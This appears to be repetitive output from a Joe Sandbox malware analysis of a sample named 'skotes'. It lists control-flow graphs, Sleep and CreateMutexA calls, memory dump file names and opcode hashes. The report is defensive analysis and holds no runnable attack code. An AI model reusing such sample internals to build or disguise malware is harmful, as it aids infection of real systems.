                                                                                                                                                                                                                                                                control_flow_graph 90 9aa1ae-9aa1ce 94 9aa1fc-9aa218 90->94 95 9aa1d0-9aa1dc 90->95 98 9aa21a-9aa226 94->98 99 9aa246-9aa265 94->99 96 9aa1de-9aa1ec 95->96 97 9aa1f2-9aa1f9 call 9bd663 95->97 96->97 100 9aa935 96->100 97->94 102 9aa228-9aa236 98->102 103 9aa23c-9aa243 call 9bd663 98->103 104 9aa293-9aa916 call 9b80c0 99->104 105 9aa267-9aa273 99->105 107 9aa953-9aa994 Sleep CreateMutexA 100->107 108 9aa935 call 9d6c6a 100->108 102->100 102->103 103->99 111 9aa289-9aa290 call 9bd663 105->111 112 9aa275-9aa283 105->112 119 9aa996-9aa998 107->119 120 9aa9a7-9aa9a8 107->120 108->107 111->104 112->100 112->111 119->120 122 9aa99a-9aa9a5 119->122 122->120
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • Sleep.KERNELBASE(00000064), ref: 009AA963
                                                                                                                                                                                                                                                                • CreateMutexA.KERNELBASE(00000000,00000000,00A03254), ref: 009AA981
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.1790996035.00000000009A1000.00000040.00000001.01000000.00000007.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1790974553.00000000009A0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1790996035.0000000000A02000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1791067167.0000000000A09000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1791090928.0000000000A0B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1791115091.0000000000A15000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1791135228.0000000000A16000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1791158600.0000000000A17000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1791284604.0000000000B71000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1791307160.0000000000B73000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1791335629.0000000000B8B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1791335629.0000000000B99000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1791412229.0000000000B9C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1791505830.0000000000B9D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1791548713.0000000000B9E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1791584418.0000000000B9F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1791648758.0000000000BA0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1791679936.0000000000BA2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1791787783.0000000000BB4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1791811526.0000000000BB5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1791885454.0000000000BC4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1791991438.0000000000BC5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792012579.0000000000BC6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792035923.0000000000BC7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792055022.0000000000BD0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792074833.0000000000BDE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792102810.0000000000C02000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792125104.0000000000C06000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792144006.0000000000C07000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792163338.0000000000C0D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792180756.0000000000C0E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792199698.0000000000C12000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792227341.0000000000C1B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792259364.0000000000C1F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792278648.0000000000C20000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792297712.0000000000C26000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792319647.0000000000C37000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792337408.0000000000C39000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792337408.0000000000C77000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792391387.0000000000C8E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792409014.0000000000C90000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792427117.0000000000CA5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792444652.0000000000CA6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792460735.0000000000CA7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792477407.0000000000CAD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792493264.0000000000CAF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792511468.0000000000CBC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792527724.0000000000CBD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_9a0000_skotes.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CreateMutexSleep
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1464230837-0
                                                                                                                                                                                                                                                                • Opcode ID: 08d03c3fe622d5a132c3ec4e009bb6b0a3f54e0b87a25ea33e7c5e0163a8c80e
                                                                                                                                                                                                                                                                • Instruction ID: e562244d1bba76d8d63ba7221ab0baf3846b5b2c82b38ccdfc528b13ada7334f
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 08d03c3fe622d5a132c3ec4e009bb6b0a3f54e0b87a25ea33e7c5e0163a8c80e
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: AC3128317042059BEB18DBBCDD8D7ADB776ABCB310F204219E414972D1D77A9981CB92

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                control_flow_graph 124 9aa418-9aa438 128 9aa43a-9aa446 124->128 129 9aa466-9aa482 124->129 132 9aa448-9aa456 128->132 133 9aa45c-9aa463 call 9bd663 128->133 130 9aa4b0-9aa4cf 129->130 131 9aa484-9aa490 129->131 136 9aa4fd-9aa916 call 9b80c0 130->136 137 9aa4d1-9aa4dd 130->137 134 9aa492-9aa4a0 131->134 135 9aa4a6-9aa4ad call 9bd663 131->135 132->133 138 9aa93f-9aa994 call 9d6c6a * 4 Sleep CreateMutexA 132->138 133->129 134->135 134->138 135->130 142 9aa4df-9aa4ed 137->142 143 9aa4f3-9aa4fa call 9bd663 137->143 160 9aa996-9aa998 138->160 161 9aa9a7-9aa9a8 138->161 142->138 142->143 143->136 160->161 162 9aa99a-9aa9a5 160->162 162->161
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • Sleep.KERNELBASE(00000064), ref: 009AA963
                                                                                                                                                                                                                                                                • CreateMutexA.KERNELBASE(00000000,00000000,00A03254), ref: 009AA981
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.1790996035.00000000009A1000.00000040.00000001.01000000.00000007.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1790974553.00000000009A0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1790996035.0000000000A02000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1791067167.0000000000A09000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1791090928.0000000000A0B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1791115091.0000000000A15000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1791135228.0000000000A16000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1791158600.0000000000A17000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1791284604.0000000000B71000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1791307160.0000000000B73000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1791335629.0000000000B8B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1791335629.0000000000B99000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1791412229.0000000000B9C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1791505830.0000000000B9D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1791548713.0000000000B9E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1791584418.0000000000B9F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1791648758.0000000000BA0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1791679936.0000000000BA2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1791787783.0000000000BB4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1791811526.0000000000BB5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1791885454.0000000000BC4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1791991438.0000000000BC5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792012579.0000000000BC6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792035923.0000000000BC7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792055022.0000000000BD0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792074833.0000000000BDE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792102810.0000000000C02000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792125104.0000000000C06000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792144006.0000000000C07000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792163338.0000000000C0D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792180756.0000000000C0E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792199698.0000000000C12000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792227341.0000000000C1B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792259364.0000000000C1F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792278648.0000000000C20000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792297712.0000000000C26000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792319647.0000000000C37000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792337408.0000000000C39000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792337408.0000000000C77000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792391387.0000000000C8E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792409014.0000000000C90000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792427117.0000000000CA5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792444652.0000000000CA6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792460735.0000000000CA7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792477407.0000000000CAD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792493264.0000000000CAF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792511468.0000000000CBC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792527724.0000000000CBD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_9a0000_skotes.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CreateMutexSleep
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1464230837-0
                                                                                                                                                                                                                                                                • Opcode ID: f9a4238388afdcd295ed6f8dfa5c33007bceb59d68497a6075bc3a2cab3237b0
                                                                                                                                                                                                                                                                • Instruction ID: cc11d9ce40b15d81cc3414118e5a2bf0f4440200654bec5a38714bed89a968ec
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f9a4238388afdcd295ed6f8dfa5c33007bceb59d68497a6075bc3a2cab3237b0
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 63312931B002059BEB089BBCDD8D7ADB7B5EFDA314F208219E054973E5D7764980CAA2

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                control_flow_graph 164 9aa54d-9aa56d 168 9aa59b-9aa5b7 164->168 169 9aa56f-9aa57b 164->169 172 9aa5b9-9aa5c5 168->172 173 9aa5e5-9aa604 168->173 170 9aa57d-9aa58b 169->170 171 9aa591-9aa598 call 9bd663 169->171 170->171 174 9aa944-9aa994 call 9d6c6a * 3 Sleep CreateMutexA 170->174 171->168 176 9aa5db-9aa5e2 call 9bd663 172->176 177 9aa5c7-9aa5d5 172->177 178 9aa632-9aa916 call 9b80c0 173->178 179 9aa606-9aa612 173->179 198 9aa996-9aa998 174->198 199 9aa9a7-9aa9a8 174->199 176->173 177->174 177->176 184 9aa628-9aa62f call 9bd663 179->184 185 9aa614-9aa622 179->185 184->178 185->174 185->184 198->199 200 9aa99a-9aa9a5 198->200 200->199
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • Sleep.KERNELBASE(00000064), ref: 009AA963
                                                                                                                                                                                                                                                                • CreateMutexA.KERNELBASE(00000000,00000000,00A03254), ref: 009AA981
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.1790996035.00000000009A1000.00000040.00000001.01000000.00000007.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1790974553.00000000009A0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1790996035.0000000000A02000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1791067167.0000000000A09000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1791090928.0000000000A0B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1791115091.0000000000A15000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1791135228.0000000000A16000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1791158600.0000000000A17000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1791284604.0000000000B71000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1791307160.0000000000B73000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1791335629.0000000000B8B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1791335629.0000000000B99000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1791412229.0000000000B9C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1791505830.0000000000B9D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1791548713.0000000000B9E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1791584418.0000000000B9F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1791648758.0000000000BA0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1791679936.0000000000BA2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1791787783.0000000000BB4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1791811526.0000000000BB5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1791885454.0000000000BC4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1791991438.0000000000BC5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792012579.0000000000BC6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792035923.0000000000BC7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792055022.0000000000BD0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792074833.0000000000BDE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792102810.0000000000C02000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792125104.0000000000C06000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792144006.0000000000C07000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792163338.0000000000C0D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792180756.0000000000C0E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792199698.0000000000C12000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792227341.0000000000C1B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792259364.0000000000C1F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792278648.0000000000C20000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792297712.0000000000C26000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792319647.0000000000C37000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792337408.0000000000C39000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792337408.0000000000C77000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792391387.0000000000C8E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792409014.0000000000C90000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792427117.0000000000CA5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792444652.0000000000CA6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792460735.0000000000CA7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792477407.0000000000CAD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792493264.0000000000CAF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792511468.0000000000CBC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792527724.0000000000CBD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_9a0000_skotes.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CreateMutexSleep
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1464230837-0
                                                                                                                                                                                                                                                                • Opcode ID: 7e81c859301397c17bed5b60ddadda75184b7149de8bef999c826789e57a911e
                                                                                                                                                                                                                                                                • Instruction ID: 40eed2bcfd23b09c9b10af4fe7ab585838a69ad9f62a13f25003041e61a65128
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7e81c859301397c17bed5b60ddadda75184b7149de8bef999c826789e57a911e
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DB313B31B012058BEB18DBBCDD897ADB776EFCA324F248618E054973D1C7768981CB96

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                control_flow_graph 202 9aa682-9aa6a2 206 9aa6d0-9aa6ec 202->206 207 9aa6a4-9aa6b0 202->207 210 9aa71a-9aa739 206->210 211 9aa6ee-9aa6fa 206->211 208 9aa6b2-9aa6c0 207->208 209 9aa6c6-9aa6cd call 9bd663 207->209 208->209 212 9aa949-9aa994 call 9d6c6a * 2 Sleep CreateMutexA 208->212 209->206 216 9aa73b-9aa747 210->216 217 9aa767-9aa916 call 9b80c0 210->217 214 9aa6fc-9aa70a 211->214 215 9aa710-9aa717 call 9bd663 211->215 234 9aa996-9aa998 212->234 235 9aa9a7-9aa9a8 212->235 214->212 214->215 215->210 222 9aa749-9aa757 216->222 223 9aa75d-9aa764 call 9bd663 216->223 222->212 222->223 223->217 234->235 236 9aa99a-9aa9a5 234->236 236->235
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • Sleep.KERNELBASE(00000064), ref: 009AA963
                                                                                                                                                                                                                                                                • CreateMutexA.KERNELBASE(00000000,00000000,00A03254), ref: 009AA981
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.1790996035.00000000009A1000.00000040.00000001.01000000.00000007.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1790974553.00000000009A0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1790996035.0000000000A02000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1791067167.0000000000A09000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1791090928.0000000000A0B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1791115091.0000000000A15000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1791135228.0000000000A16000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1791158600.0000000000A17000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1791284604.0000000000B71000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1791307160.0000000000B73000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1791335629.0000000000B8B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1791335629.0000000000B99000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1791412229.0000000000B9C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1791505830.0000000000B9D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1791548713.0000000000B9E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1791584418.0000000000B9F000.00000040.00000001.01000000.00000007.sdmpDownload File
